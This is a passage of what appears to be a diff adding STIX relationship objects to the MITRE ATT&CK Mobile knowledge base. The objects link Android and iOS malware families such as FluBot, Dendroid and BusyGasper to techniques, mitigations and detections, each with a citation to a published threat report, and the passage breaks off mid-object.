"identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--9c302eb1-1810-48a5-b34d-6aae303d2097", + "created": "2022-04-01T15:16:26.387Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "Users should 
be instructed to not open links in applications they don’t recognize.", + "modified": "2022-04-01T15:16:26.387Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--653492e3-27be-4a0e-b08c-938dd2b7e0e1", + "target_ref": "attack-pattern--789ef15a-34d9-4b32-a779-8cbbc9eb32f5", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--e8768455-4d0c-4e3c-a901-1fc871227745", + "created": "2022-03-30T17:54:56.603Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "", + "modified": "2022-03-30T17:54:56.603Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--786f488c-cb1f-4602-89c5-86d982ee326b", + "target_ref": "attack-pattern--6ffad4be-bfe0-424f-abde-4d9a84a800ad", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--4920a041-86f7-495b-896c-4d964950ed7e", + "type": "relationship", + "created": "2020-12-17T20:15:22.454Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Palo Alto HenBox", + "url": "https://unit42.paloaltonetworks.com/unit42-henbox-chickens-come-home-roost/", + "description": "A. Hinchliffe, M. Harbison, J. Miller-Osborn, et al. (2018, March 13). HenBox: The Chickens Come Home to Roost. Retrieved September 9, 2019." 
+ } + ], + "modified": "2020-12-17T20:15:22.454Z", + "description": "[HenBox](https://attack.mitre.org/software/S0544) has contained native libraries.(Citation: Palo Alto HenBox)", + "relationship_type": "uses", + "source_ref": "malware--aef537ba-10c2-40ed-a57a-80b8508aada4", + "target_ref": "attack-pattern--52eff1c7-dd30-4121-b762-24ae6fa61bbb", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--25de6cf6-38d5-4d1e-b3f1-6956a0ff0ac3", + "created": "2023-03-03T16:26:48.531Z", + "revoked": false, + "external_references": [ + { + "source_name": "paloalto_yispecter_1015", + "description": "Claud Xiao. (2015, October 4). YiSpecter: First iOS Malware That Attacks Non-jailbroken Apple iOS Devices by Abusing Private APIs. Retrieved March 3, 2023.", + "url": "https://unit42.paloaltonetworks.com/yispecter-first-ios-malware-attacks-non-jailbroken-ios-devices-by-abusing-private-apis/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-03T16:26:48.531Z", + "description": "[YiSpecter](https://attack.mitre.org/software/S0311) has collected compromised device MAC addresses.(Citation: paloalto_yispecter_1015)", + "relationship_type": "uses", + "source_ref": "malware--a15c9357-2be0-4836-beec-594f28b9b4a9", + "target_ref": "attack-pattern--d4536441-1bcc-49fa-80ae-a596ed3f7ffd", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--3abcd7f4-5f6d-4b5d-9b37-eee68751dcbd", + "created": "2022-04-01T15:02:43.475Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": 
false, + "revoked": false, + "description": "", + "modified": "2022-04-01T15:02:43.475Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--27f483c6-6666-44fa-8532-ffd5fc7dab38", + "target_ref": "attack-pattern--8605a0ec-b44a-4e98-a7fc-87d4bd3acb66", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--a2803d73-f5bf-4815-bfbf-662c372e1f5a", + "created": "2023-03-20T18:53:52.174Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T18:53:52.174Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--5ae32c6a-2d12-4b8f-81ca-f862f2be0962", + "target_ref": "attack-pattern--233fe2c0-cb41-4765-b454-e0087597fbce", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--fb587f81-1300-438d-a33b-f8d08530788b", + "created": "2019-07-10T15:35:43.704Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Lookout Dark Caracal Jan 2018", + "description": "Blaich, A., et al. (2018, January 18). Dark Caracal: Cyber-espionage at a Global Scale. 
Retrieved April 11, 2018.", + "url": "https://info.lookout.com/rs/051-ESQ-475/images/Lookout_Dark-Caracal_srr_20180118_us_v.1.0.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:41:13.182Z", + "description": "[Pallas](https://attack.mitre.org/software/S0399) exfiltrates data using HTTP.(Citation: Lookout Dark Caracal Jan 2018)", + "relationship_type": "uses", + "source_ref": "malware--c41a8b7c-3e42-4eee-b87d-ad8a100ee878", + "target_ref": "attack-pattern--32063d7f-0a39-440d-a4a3-2694488f96cc", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--a808c887-b2b8-4b05-9cab-47c918e48d48", + "type": "relationship", + "created": "2020-12-14T15:02:35.257Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Securelist Asacub", + "url": "https://securelist.com/the-rise-of-mobile-banker-asacub/87591/", + "description": "T. Shishkova. (2018, August 28). The rise of mobile banker Asacub. Retrieved December 14, 2020." 
+ } + ], + "modified": "2020-12-14T15:02:35.257Z", + "description": "[Asacub](https://attack.mitre.org/software/S0540) can send SMS messages from compromised devices.(Citation: Securelist Asacub) ", + "relationship_type": "uses", + "source_ref": "malware--a76b837b-93cc-417d-bf28-c47a6a284fa4", + "target_ref": "attack-pattern--b327a9c0-e709-495c-aa6e-00b042136e2b", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--e245e45a-71a8-408d-8f32-7b7337bffc26", + "created": "2023-01-18T19:19:58.007Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "cyble_drinik_1022", + "description": "Cyble. (2022, October 27). Drinik Malware Returns With Advanced Capabilities Targeting Indian Taxpayers. Retrieved January 18, 2023.", + "url": "https://blog.cyble.com/2022/10/27/drinik-malware-returns-with-advanced-capabilities-targeting-indian-taxpayers/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-27T18:10:23.208Z", + "description": "[Drinik](https://attack.mitre.org/software/S1054) can hide its application icon.(Citation: cyble_drinik_1022)", + "relationship_type": "uses", + "source_ref": "malware--d6e009b7-df5e-447a-bfd2-d5b77374edfe", + "target_ref": "attack-pattern--f05fc151-aa62-47e3-ae57-2d1b23d64bf6", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--bb83ee25-8875-4806-9f69-ac39bf7cb402", + "created": "2021-10-01T14:42:49.178Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "SecureList BusyGasper", + "description": "Alexey Firsh. 
(2018, August 29). BusyGasper – the unfriendly spy. Retrieved October 1, 2021.", + "url": "https://securelist.com/busygasper-the-unfriendly-spy/87627/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:25:39.509Z", + "description": "[BusyGasper](https://attack.mitre.org/software/S0655) can collect SMS messages.(Citation: SecureList BusyGasper)", + "relationship_type": "uses", + "source_ref": "malware--e110f94a-e2c5-4f5f-ba78-9c2ab6d2d9e4", + "target_ref": "attack-pattern--c6421411-ae61-42bb-9098-73fddb315002", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--2065382f-45ae-4b9a-a77c-027ecd6c1735", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "TrendMicro-RCSAndroid", + "description": "Veo Zhang. (2015, July 21). Hacking Team RCSAndroid Spying Tool Listens to Calls; Roots Devices to Get In. 
Retrieved December 22, 2016.", + "url": "http://blog.trendmicro.com/trendlabs-security-intelligence/hacking-team-rcsandroid-spying-tool-listens-to-calls-roots-devices-to-get-in/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:23:38.651Z", + "description": "[RCSAndroid](https://attack.mitre.org/software/S0295) can collect SMS, MMS, and Gmail messages.(Citation: TrendMicro-RCSAndroid)", + "relationship_type": "uses", + "source_ref": "malware--363bc05d-13cb-4e98-a5b7-e250f2bbdc2b", + "target_ref": "attack-pattern--c6421411-ae61-42bb-9098-73fddb315002", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--24de6f6e-86d3-4e4e-a965-3e0435205f48", + "created": "2020-09-24T15:34:51.298Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Lookout-Dendroid", + "description": "Marc Rogers. (2014, March 6). Dendroid malware can take over your camera, record audio, and sneak into Google Play. 
Retrieved December 22, 2016.", + "url": "https://blog.lookout.com/blog/2014/03/06/dendroid/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:24:09.872Z", + "description": "[Dendroid](https://attack.mitre.org/software/S0301) can intercept SMS messages.(Citation: Lookout-Dendroid)", + "relationship_type": "uses", + "source_ref": "malware--317a2c10-d489-431e-b6b2-f0251fddc88e", + "target_ref": "attack-pattern--c6421411-ae61-42bb-9098-73fddb315002", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--4b7e117b-0c82-49d0-bee6-119158b3355b", + "created": "2023-02-28T20:32:37.800Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "proofpoint_flubot_0421", + "description": "Crista Giering, F. Naves, Andrew Conway, Adam McNeil . (2021, April 27). FluBot Android Malware Spreading Rapidly Through Europe, May Hit U.S. Soon. 
Retrieved February 28, 2023.", + "url": "https://www.proofpoint.com/us/blog/threat-insight/flubot-android-malware-spreading-rapidly-through-europe-may-hit-us-soon" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-02-28T20:32:50.168Z", + "description": "[FluBot](https://attack.mitre.org/software/S1067) can disable Google Play Protect to prevent detection.(Citation: proofpoint_flubot_0421)", + "relationship_type": "uses", + "source_ref": "malware--f5ff006c-702f-4ded-8e60-ca6c540d91bc", + "target_ref": "attack-pattern--2aa78dfd-cb6f-4c70-9408-137cfd96be49", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--57293fc9-8838-4acd-a16f-48f516d0921e", + "created": "2020-04-08T15:51:25.122Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "ThreatFabric Ginp", + "description": "ThreatFabric. (2019, November). Ginp - A malware patchwork borrowing from Anubis. 
Retrieved April 8, 2020.", + "url": "https://www.threatfabric.com/blogs/ginp_a_malware_patchwork_borrowing_from_anubis.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:29:51.699Z", + "description": "[Ginp](https://attack.mitre.org/software/S0423) hides its icon after installation.(Citation: ThreatFabric Ginp)", + "relationship_type": "uses", + "source_ref": "malware--6146be90-470c-4049-bb3a-9986b8ffb65b", + "target_ref": "attack-pattern--f05fc151-aa62-47e3-ae57-2d1b23d64bf6", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--80ac52f9-ffa4-4b6e-b420-95d1b69ae9d9", + "type": "relationship", + "created": "2021-01-05T20:16:20.502Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Zscaler TikTok Spyware", + "url": "https://www.zscaler.com/blogs/security-research/tiktok-spyware", + "description": "S. Desai. (2020, September 8). TikTok Spyware. Retrieved January 5, 2021." 
+ } + ], + "modified": "2021-01-05T20:16:20.502Z", + "description": "[Tiktok Pro](https://attack.mitre.org/software/S0558) can take screenshots.(Citation: Zscaler TikTok Spyware)", + "relationship_type": "uses", + "source_ref": "malware--c6abcaf8-1765-41f8-9fe5-03d42fd0f6c0", + "target_ref": "attack-pattern--73c26732-6422-4081-8b63-6d0ae93d449e", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--d663cb6f-9fc8-48a0-827f-29757b12ae71", + "created": "2022-03-30T20:53:54.296Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "", + "modified": "2022-03-30T20:53:54.296Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--e422b6fa-4739-46b9-992e-82f1b350c780", + "target_ref": "attack-pattern--498e7b81-238d-404c-aa5e-332904d63286", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--5e74f4f8-5057-42f4-9796-aee60122cf6d", + "created": "2019-09-23T13:36:08.451Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "securelist rotexy 2018", + "url": "https://securelist.com/the-rotexy-mobile-trojan-banker-and-ransomware/88893/", + "description": "T. Shishkova, L. Pikman. (2018, November 22). The Rotexy mobile Trojan – banker and ransomware. Retrieved September 23, 2019." 
+ } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[Rotexy](https://attack.mitre.org/software/S0411) procedurally generates subdomains for command and control communication.(Citation: securelist rotexy 2018)", + "modified": "2022-04-12T10:01:44.682Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "malware--0626c181-93cb-4860-9cb0-dff3b1c13063", + "target_ref": "attack-pattern--fd211238-f767-4599-8c0d-9dca36624626", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--e33106e1-16ef-41b8-8d47-78c9f2b4dceb", + "created": "2020-11-10T17:08:35.846Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "Lookout Uyghur Campaign", + "url": "https://www.lookout.com/documents/threat-reports/us/lookout-uyghur-malware-tr-us.pdf", + "description": "A. Kumar, K. Del Rosso, J. Albrecht, C. Hebeisen. (2020, June 1). Mobile APT Surveillance Campaigns Targeting Uyghurs - A collection of long-running Android tooling connected to a Chinese mAPT actor. Retrieved November 10, 2020." 
+ } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[CarbonSteal](https://attack.mitre.org/software/S0529) has used specially crafted SMS messages to control the target device.(Citation: Lookout Uyghur Campaign) ", + "modified": "2022-04-19T14:25:41.669Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "malware--007ebf84-4e14-44c7-a5aa-151d5de85320", + "target_ref": "attack-pattern--ec4c4baa-026f-43e8-8f56-58c36f3162dd", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--15eccf44-e528-41fb-9cb8-834c8c0ca9d9", + "type": "relationship", + "created": "2020-04-24T17:46:31.582Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "SecurityIntelligence TrickMo", + "url": "https://securityintelligence.com/posts/trickbot-pushing-a-2fa-bypass-app-to-bank-customers-in-germany/", + "description": "P. Asinovsky. (2020, March 24). TrickBot Pushing a 2FA Bypass App to Bank Customers in Germany. Retrieved April 24, 2020." 
+ } + ], + "modified": "2020-04-24T17:46:31.582Z", + "description": "[TrickMo](https://attack.mitre.org/software/S0427) can collect device network configuration information such as IMSI, IMEI, and Wi-Fi connection state.(Citation: SecurityIntelligence TrickMo)", + "relationship_type": "uses", + "source_ref": "malware--21170624-89db-4e99-bf27-58d26be07c3a", + "target_ref": "attack-pattern--d4536441-1bcc-49fa-80ae-a596ed3f7ffd", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--b45cf5e0-7427-4d5c-be2c-22f5231493d1", + "type": "relationship", + "created": "2021-10-01T14:42:49.184Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "SecureList BusyGasper", + "url": "https://securelist.com/busygasper-the-unfriendly-spy/87627/", + "description": "Alexey Firsh. (2018, August 29). BusyGasper – the unfriendly spy. Retrieved October 1, 2021." 
+ } + ], + "modified": "2021-10-01T14:42:49.184Z", + "description": "[BusyGasper](https://attack.mitre.org/software/S0655) can collect the device’s location information based on cellular network or GPS coordinates.(Citation: SecureList BusyGasper)", + "relationship_type": "uses", + "source_ref": "malware--e110f94a-e2c5-4f5f-ba78-9c2ab6d2d9e4", + "target_ref": "attack-pattern--99e6295e-741b-4857-b6e5-64989eb039b4", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--9432fabf-9487-469c-86c9-b9d26b013c85", + "created": "2022-04-01T13:13:10.587Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "Call Log access an uncommonly needed permission, so users should be instructedto use extra scrutiny when granting access to their call logs. ", + "modified": "2022-04-01T13:13:10.587Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--653492e3-27be-4a0e-b08c-938dd2b7e0e1", + "target_ref": "attack-pattern--1d1b1558-c833-482e-aabb-d07ef6eae63d", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--a98c127b-8da9-4ea5-980e-d154ea541ec9", + "created": "2022-04-01T17:08:15.158Z", + "x_mitre_version": "0.1", + "external_references": [ + { + "source_name": "CSRIC5-WG10-FinalReport", + "url": "https://www.fcc.gov/files/csric5-wg10-finalreport031517pdf", + "description": "Communications Security, Reliability, Interoperability Council (CSRIC). (2017, March). Working Group 10 Legacy Systems Risk Reductions Final Report. 
Retrieved May 24, 2017." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "Filtering requests by checking request origin information may provide some defense against spurious operators.(Citation: CSRIC5-WG10-FinalReport) ", + "modified": "2022-04-11T19:09:00.362Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "mitigates", + "source_ref": "course-of-action--e829ee51-1caf-4665-ba15-7f8979634124", + "target_ref": "attack-pattern--99e6295e-741b-4857-b6e5-64989eb039b4", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--9e66ec3b-cdd6-461c-bd84-e75316818e15", + "type": "relationship", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "CrowdStrike-Android", + "description": "CrowdStrike Global Intelligence Team. (2016). Use of Fancy Bear Android Malware in Tracking of Ukrainian FIeld Artillery Units. 
Retrieved February 6, 2017.", + "url": "https://www.crowdstrike.com/wp-content/brochures/FancyBearTracksUkrainianArtillery.pdf" + } + ], + "modified": "2018-10-17T00:14:20.652Z", + "description": "[X-Agent for Android](https://attack.mitre.org/software/S0314) was believed to have been used to obtain locational data of Ukrainian artillery forces.(Citation: CrowdStrike-Android)", + "relationship_type": "uses", + "source_ref": "malware--56660521-6db4-4e5a-a927-464f22954b7c", + "target_ref": "attack-pattern--99e6295e-741b-4857-b6e5-64989eb039b4", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--319d46b5-de41-4f23-9001-2fa75f954720", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Kaspersky-MobileMalware", + "description": "Roman Unuchek and Victor Chebyshev. (2014, February 24). Mobile Malware Evolution: 2013. 
Retrieved December 22, 2016.", + "url": "https://securelist.com/mobile-malware-evolution-2013/58335/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:01:14.020Z", + "description": "[Trojan-SMS.AndroidOS.Agent.ao](https://attack.mitre.org/software/S0307) uses Google Cloud Messaging (GCM) for command and control.(Citation: Kaspersky-MobileMalware)", + "relationship_type": "uses", + "source_ref": "malware--a1867c56-8c86-455a-96ad-b0d5f7e2bc17", + "target_ref": "attack-pattern--2282a98b-5049-4f61-9381-55baca7c1add", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--3d5f7bdf-ab59-48f9-89d5-23f9d8cd235b", + "type": "relationship", + "created": "2021-01-05T20:16:20.419Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Zscaler TikTok Spyware", + "url": "https://www.zscaler.com/blogs/security-research/tiktok-spyware", + "description": "S. Desai. (2020, September 8). TikTok Spyware. Retrieved January 5, 2021." 
+ } + ], + "modified": "2021-01-05T20:16:20.419Z", + "description": "[Tiktok Pro](https://attack.mitre.org/software/S0558) can capture audio from the device’s microphone and can record phone calls.(Citation: Zscaler TikTok Spyware)", + "relationship_type": "uses", + "source_ref": "malware--c6abcaf8-1765-41f8-9fe5-03d42fd0f6c0", + "target_ref": "attack-pattern--6683aa0c-d98a-4f5b-ac57-ca7e9934a760", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--f051c943-998c-4db2-9dbc-d4755057bcf0", + "created": "2022-04-05T19:49:06.417Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "An EMM/MDM can use the Android `DevicePolicyManager.setPermittedAccessibilityServices` method to set an explicit list of applications that are allowed to use Android's accessibility features.", + "modified": "2022-04-05T19:49:06.417Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--649f7268-4c12-483b-ac84-4b7bca9fe2ee", + "target_ref": "attack-pattern--4c58b7c6-a839-4789-bda9-9de33e4d4512", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--fa222de8-ba3a-45c1-a7eb-d7502843cc2d", + "type": "relationship", + "created": "2021-01-05T20:16:20.417Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Zscaler TikTok Spyware", + "url": "https://www.zscaler.com/blogs/security-research/tiktok-spyware", + "description": "S. Desai. (2020, September 8). TikTok Spyware. Retrieved January 5, 2021." 
+ } + ], + "modified": "2021-01-05T20:16:20.417Z", + "description": "[Tiktok Pro](https://attack.mitre.org/software/S0558) can capture photos and videos from the device’s camera.(Citation: Zscaler TikTok Spyware)", + "relationship_type": "uses", + "source_ref": "malware--c6abcaf8-1765-41f8-9fe5-03d42fd0f6c0", + "target_ref": "attack-pattern--d8940e76-f9c1-4912-bea6-e21c251370b6", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--9c7c302a-d5ba-4fc9-a4e5-e865fd7fb708", + "type": "relationship", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Kaspersky-WUC", + "description": "Costin Raiu, Denis Maslennikov, Kurt Baumgartner. (2013, March 26). Android Trojan Found in Targeted Attack. Retrieved December 23, 2016.", + "url": "https://securelist.com/android-trojan-found-in-targeted-attack-58/35552/" + } + ], + "modified": 